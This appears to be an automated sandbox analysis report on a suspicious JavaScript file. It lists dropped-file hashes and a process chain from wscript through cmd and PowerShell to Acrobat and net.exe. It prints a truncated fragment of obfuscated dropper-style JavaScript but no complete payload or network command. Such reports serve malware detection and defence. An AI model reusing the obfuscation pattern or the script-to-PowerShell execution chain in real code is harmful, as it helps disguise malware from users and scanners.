Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.326743775967429 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX/RuIju7ml4WsGiIPEeOF0Y1T4oAvJfYdPeUkwRe9:YvXKX/RuIEmlbsdTeOBGg8Ukee9 |
MD5: | 632F48B83A17A33D3B7E3CB9C884058A |
SHA1: | 1EB6DEF0C21492900D20AC76ACDAE6EFE9D43B2A |
SHA-256: | EDA5E8D9B3518755E18A498076BDFE5EE2EAE3FC0E2AF5E87AC052CA29DFAA82 |
SHA-512: | 2FBBFC62C86707A0002DDF68B540D43A2799237932FB5C5689B9D757792CD51BDA07A71F5F80EADFE64BE2545332EAF165BDB58EAA47E8219D95F28F09625BAB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.3135639808441315 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX/RuIju7ml4WsGiIPEeOF0Y1T4oAvJf+dPeUkwRe9:YvXKX/RuIEmlbsdTeOBG28Ukee9 |
MD5: | B2DA7BACB58791FFBD26402058BCBECF |
SHA1: | 370F001EB4DD2E199219F2477A4CB182F4A925D8 |
SHA-256: | D93E79B0C1AC41A0F14E4412E0E6146231A13D7EB660F20CCC2466672D870C97 |
SHA-512: | DB8ED4F0208256F6AC07CD905E0EEBEDEBCBC831BDE34D9219952BB72A884FA42FC3146A981EFA079A7D7CD03F1B522039E1D579D4D0253983616E8E526E10C1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.310107067620899 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX/RuIju7ml4WsGiIPEeOF0Y1T4oAvJfbPtdPeUkwRe9:YvXKX/RuIEmlbsdTeOBGDV8Ukee9 |
MD5: | D4123259A79947C2D4C52247D2DD0B0A |
SHA1: | 9286D2C41F013B4462E2B9AADA54CD5E0C0F6D34 |
SHA-256: | F5C2A695CCC8F22B69D0F3DB52F37ABA98E45970EEE9EB6CEA793DA5F9700128 |
SHA-512: | 2F271B2BBA314C58F84AAC8311DB94050840345F9551E8A398F91D67B783FCCD5642AC6FE47DFE85D65BF643C74DD123DD8D6A725E5C008A942FA4FCA250B6DD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.31447894396393 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX/RuIju7ml4WsGiIPEeOF0Y1T4oAvJf21rPeUkwRe9:YvXKX/RuIEmlbsdTeOBG+16Ukee9 |
MD5: | 8F02E0DDFB6F2A5F1AC5382A9A184278 |
SHA1: | EA239C3C851E993DDC4EE1C691195020CF18407C |
SHA-256: | 4C5938989487121B626295F47748B23719FED6C03CA9AA7B9ACFF4E8D6C67C2D |
SHA-512: | A4D189D733D5B649BC5162EA10B3F49B0620DF986F559687B6A0CA8D3A64446E6EC7A66933817DADC9FD0B8B5D5A0B068A02780AD503B930A27EEC0882D95123 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.6673820504513985 |
Encrypted: | false |
SSDEEP: | 24:Yv6XrbmeO6amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSd:Yv7etBgkDMUJUAh8cvMd |
MD5: | 8C8644A12EF2EBAA4F3E3CECB19493DD |
SHA1: | EDFA65B25E2F8276033627DC653F1D9FD5F1DBD3 |
SHA-256: | D6497CC600CD3F415589CBB3823E1CE4763098038DD76A53723C81D531241C46 |
SHA-512: | 0325E4016853A77B9DB55E3CD0E5020F79B05EBE58ABEA6025A6FDA3C5A40289F43CE336CDF964F00E893C990F068FC7F1BF225728B5FA8A0CD9CA10E0991FD0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.290019533823485 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX/RuIju7ml4WsGiIPEeOF0Y1T4oAvJfshHHrPeUkwRe9:YvXKX/RuIEmlbsdTeOBGUUUkee9 |
MD5: | 05FD21D8229CA63DD3852DA403383DF3 |
SHA1: | 5C3B5E252340916CB9213FAAA8363B5C54FEBD0E |
SHA-256: | C92FEE42A2DA4AA2140B4CE8AA4B87BA53E437EE84212F7C59571605167942D7 |
SHA-512: | 62A88F33876514B49BBFF140357B341C9392A516173B0DF90838A8CED5CB0D13B92F80C76FD1A103D7E7D3B3C08004C03FCB0C04AEA710D32CCF2EAAAED4AA1D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.305399441023433 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX/RuIju7ml4WsGiIPEeOF0Y1T4oAvJTqgFCrPeUkwRe9:YvXKX/RuIEmlbsdTeOBGTq16Ukee9 |
MD5: | 5639C20210C5CF6DFA4BA6A9056178CC |
SHA1: | 770AA0DA7C54A9ADA15D804EF95F6C04CC365C4D |
SHA-256: | 324A39AAE491BE212CCB9702CC196829AFA715067326CA22E6F8DEF5EB0E71CE |
SHA-512: | 60CE943149DD75711CF50A3E51752CF42AE4E0C2A6E857C50554199DEEFC1982AAB80EB301CE8412907860610C16ACABFDA802675F7DEB13232E9659F6F318D8 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.1334628899416925 |
Encrypted: | false |
SSDEEP: | 24:YpAfanayN97vDC55dwJVBbXvNsE9GwEym/ICxjztj0S12Wq/2LS6bmTHT5F9Eunj:Y197bKiJVhrDW9ZTKkbmTzv9Z |
MD5: | 841A8559B1288C0C3DAC8C0BE181F691 |
SHA1: | 7722721E5F823E5DBE9430D59D0B3558B27490B1 |
SHA-256: | ED56AC358926FACEC49CD2AE0C852201893C66B2F6987D9D1417E24B6CF499B3 |
SHA-512: | 2B8BB7032B810B0D62B6CD7FFC2E5EC33DC75945FA5CC05DC7EA43CC272F42EC14A72BD15444364C362689BF56A40F1EDE05FC4E352212E4B638D219AEB302DC |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.454733534973685 |
Encrypted: | false |
SSDEEP: | 48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dsklc:lNVmsw3SHtbDbPe0K3+fDZdM |
MD5: | F84A32838080159AD46107508136D50A |
SHA1: | DD67CB25D6BB11BEC206F7DEAA0CD27E20C3C391 |
SHA-256: | C5E3FBBC9BFAAE70168D899DEECAECAE69866A0FA88F410AE54F5674F276286C |
SHA-512: | 1430DC891EF57B5DF67B798DEB2B7F81561972B6A0645B1E7FBB1CF4D95150E8B31838E62C9F8CBCAB970C59260218A48B296FC2F142B9C282D6A4D100B4665D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.959748910003054 |
Encrypted: | false |
SSDEEP: | 48:7MQrvrBd6dHtbGIbPe0K3+fDy2dsB1qFl2GL7ms6:7h3SHtbDbPe0K3+fDZdGKVms6 |
MD5: | DE70357F7C7AEF78BE85C43A8593FF2B |
SHA1: | 5D6A82E07D043336428667CE025B0115913E8F45 |
SHA-256: | 222E2EC4F14BC25D09FE9172A7D96E6221D3AB376424F49F8FD0B28A9C3238C3 |
SHA-512: | C819F8625E03E41BF90A5D8C3F80868B7CB84F3A72E00B369BBEFD4E3DDC4C0D2FB2C6D62654F800D5398A6317B9624F6554031DDF20BA2B744B206007BD549D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgh/LrgHAmnpxnUD1CMQ2QbjcYyu:6a6TZ44ADEhTrSxECMa3cK |
MD5: | 412A97DF6A740769FB4B817DC29C2B56 |
SHA1: | 16FAB304AC8395D3F2BD8520DDF84EC39FEC5423 |
SHA-256: | 2F4F989EA7848525BD3E420A28EDC8FAE69DECD353BF72C2BC114582257C5554 |
SHA-512: | 8FE83FC89FB2BBE994E9B6B685A780808B315F913869AEBAFDBB4852868A0418B0D03BBCA9C8FF9E53B7759E8FF748EB98F7BE66F5537A6A559BE47C9BF4D42C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulDm0ll//Z:NllU6cl/ |
MD5: | DA1F22117B9766A1F0220503765A5BA5 |
SHA1: | D35597157EFE03AA1A88C1834DF8040B3DD3F3CB |
SHA-256: | BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69 |
SHA-512: | 520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.5085442896850614 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClEAwCH:Qw946cPbiOxDlbYnuRK+bDAl |
MD5: | 4A4FB811EF67768CF9BEB7FFD95F86C8 |
SHA1: | 98112CB333B10CD70A49763F524C27FED8F7B3E8 |
SHA-256: | 3AF31A117A3D2C2F6FED80210AAC102E251D67531780F1750D5F8E52631FE320 |
SHA-512: | 7F01BF7A02ECEBA41F922782992A0391146D173791B2BDFE8584BB4FE215C183A718E2E6879BA24B4F4FEE7F6AE6DC97A323C81E7365B6040FF0B3EBD1F36E74 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 11-57-54-163.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.386483451061953 |
Encrypted: | false |
SSDEEP: | 384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID |
MD5: | F49CA270724D610D1589E217EA78D6D1 |
SHA1: | 22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3 |
SHA-256: | D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D |
SHA-512: | 181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.384790422732718 |
Encrypted: | false |
SSDEEP: | 384:5wDlPlkl/0P0A04K080x0YdzsGL0qX1m93HMPQqpxruVQkSaq23HHP52OH/0/pcZ:2UZ |
MD5: | 7B6BC88F653B90DD19BD5A9061908ACF |
SHA1: | FE342C033DA8C2DA8BB841E1A52B4F63C55313FC |
SHA-256: | 6A9E9B95722D30CAA89039A6EE22F0B5E85C4A9A38287B225BF1D50406E6CB6B |
SHA-512: | 6AB9291ADD7D49A7399C032BCE9276DE8C0330562E085982CF4D4B623942B2EB2197027B384675FDDE93AA4F915F9C522900AB2673B4B13C60849E2E09ED48E0 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 35721 |
Entropy (8bit): | 5.4114932895712595 |
Encrypted: | false |
SSDEEP: | 768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRoO:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gR/ |
MD5: | 0971F8022AA65596A9A5CB3A02D25FD6 |
SHA1: | CF3106B8431F0A672566C6FE2A5B829555A0911E |
SHA-256: | D8E3F2477939097344D063665BC0BFC825A9E7AF4831F663DA21E526A970D490 |
SHA-512: | FEF60564CE49E334FE311C32E61B31D20DD73B9751EB6218D89E8C0344D9DF77D31311B6044D7A50A455DA27D14F81868C078005B30BB35C4422DF08646C9A0E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/VR9WL07oXGZnYIGNPJNdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:tR9WLxXGZnZGh3mlind9i4ufFXpAXkru |
MD5: | 9D85D4B75E446857CE3D750299B2AF1A |
SHA1: | 3CD9576D0A07B9E4454F4FF4DDF8D18EFBB764B4 |
SHA-256: | D3C44F50FD2912C92DAF009689B221515709E00C839A8DA425078C96F2D6053A |
SHA-512: | 1C63A091EF404FC446F1A789D33258FE9F6AD25C80375CADADF0829BC5DCD70A16A8E30E664D0A02F39E7A3D10B9E56AD7F9CA9D733A877726C1DD043B14842F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/vlwYIGNPudpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oYGZRs:VwZGU3mlind9i4ufFXpAXkrfUs0qWLxq |
MD5: | 03691482A2D1F1948C141A38CAC2EE1A |
SHA1: | 8BB29C2D842ABE9364532C5AA3D71B5093367E56 |
SHA-256: | E3100C03D42BBF8D34D8BA82F15038AEA5DDC6ED947211ACB41B4C465BA7F5FE |
SHA-512: | 2A0F7DC3A5ED2A28FE2AAB583AD49B29CC6547930F71DE915EDE64925B8C5B36A1B234004BDA6108AE9D8F3140F0019828337BB82D7E0FF1057215CB6CAEE6D3 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.8896135257576265 |
TrID: | |
File name: | 2649727971102843099.js |
File size: | 20'798 bytes |
MD5: | c8e89385fb737f7f28d7b64373eaf3fb |
SHA1: | b9e27976a4863c0eea94246486afaa73aa509887 |
SHA256: | 43eb4de0dc99c908ce7c8bd7d5cbd96f903138861505389cfe375112f2a24772 |
SHA512: | 492ef1636d827e3240a95ebfc69b5c3f79a9aff579f7850cd559a187c1a53968a5d6f85280a7705d2b896573dc2626f4aea215c8ed28e235fb3702b49fa89c9b |
SSDEEP: | 384:IGVgWzHJKAStegH4gO4eAPlOxR4YQbTtMyCE29VrkbKjjYMc+eU:9VStegYgO4eA04vtMyCE29VrkbKjjYMn |
TLSH: | C59255146C29AF48CFFD542D3E6E0A57077D80B4CA71A0AA34581AC05FE2E1779F78B9 |
File Content Preview: | function knkecsl(){mykya=[1031,3079,5127,4103,2055,3072];var bffyvqj=this[ybcgjmkzg+fegpk+nnnwpvtmn+zqiwd+fevpv+estxq+ptvohnpnk+wwpjdnm](this[jyugwkb+qanvax+tfkloc+nnnwpvtmn+endrglbbf+ybcgjmkzg+wwpjdnm][emjsi+nnnwpvtmn+fevpv+fegpk+wwpjdnm+fevpv+whbrb+yrlp |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 1 |
Start time: | 11:57:43 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7d6f20000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 11:57:44 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62fe50000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 11:57:44 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff75da10000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 11:57:44 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff741d30000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 11:57:50 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff702560000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 8 |
Start time: | 11:57:50 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62fe50000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 9 |
Start time: | 11:57:50 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6e8ed0000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 10 |
Start time: | 11:57:51 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
